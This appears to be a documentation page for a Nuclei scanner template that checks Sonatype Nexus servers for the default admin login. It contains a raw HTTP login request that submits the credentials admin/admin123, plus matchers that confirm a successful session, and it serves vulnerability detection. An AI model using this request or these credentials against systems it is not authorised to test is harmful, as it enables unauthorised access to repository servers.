Skip to content

Nexus Default Login

ID: nexus-default-login

Severity: high

Author: pikpikcu

Tags: nexus,default-login

Nexus default admin credentials were discovered.

id: nexus-default-login
info:
name: Nexus Default Login
author: pikpikcu
severity: high
description: Nexus default admin credentials were discovered.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
metadata:
max-request: 1
tags: nexus,default-login
http:
- raw:
- |
POST /service/rapture/session HTTP/1.1
Host: {{Hostname}}
X-Nexus-UI: true
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username={{base64(username)}}&password={{base64(password)}}
payloads:
username:
- admin
password:
- admin123
attack: pitchfork
matchers-condition: and
matchers:
- type: status
status:
- 204
- type: word
words:
- "Server: Nexus"
- "NXSESSIONID"
part: header
condition: and
# digest: 4a0a00473045022100c9743b4a6f870ece5f56e6063ac5d0262f5cecf84745e81d69850de2855f6a8602202dbe25ad727d0019bb2925f3dd533cf917aa4941bc75fe9027283b61393de453:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/nexus/nexus-default-login.yaml"

View on Github